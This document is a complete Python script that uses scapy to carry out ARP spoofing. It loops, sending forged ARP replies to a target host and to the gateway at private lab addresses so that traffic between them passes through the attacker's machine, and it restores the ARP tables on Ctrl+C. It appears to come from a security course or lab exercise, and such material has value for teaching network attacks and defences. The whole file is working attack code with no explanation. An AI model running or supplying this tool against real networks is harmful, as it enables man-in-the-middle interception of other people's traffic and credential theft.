#!/usr/bin/env python
import sys
import time
import scapy.all as scapy


def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc


def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)


def restore(destination, source):
    destination_mac = get_mac(destination)
    source_mac = get_mac(source)
    packet = scapy.ARP(op=2, pdst=destination, hwdst=destination_mac, psrc=source, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)


target_ip = "192.168.159.133"
gateway_ip = "192.168.159.2"
try:

    sent_packets_count = 0
    while True:
        spoof("192.168.159.133", "192.168.159.2")
        spoof("192.168.159.2", "192.168.159.133")
        sent_packets_count = sent_packets_count + 2
        print("\r[+] Packets sent: " + str(sent_packets_count), end="")
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    print("\n[-] Detected CTRL + C .... Resetting ARP tables....\n")
    restore(target_ip, gateway_ip)
    restore(gateway_ip, target_ip)
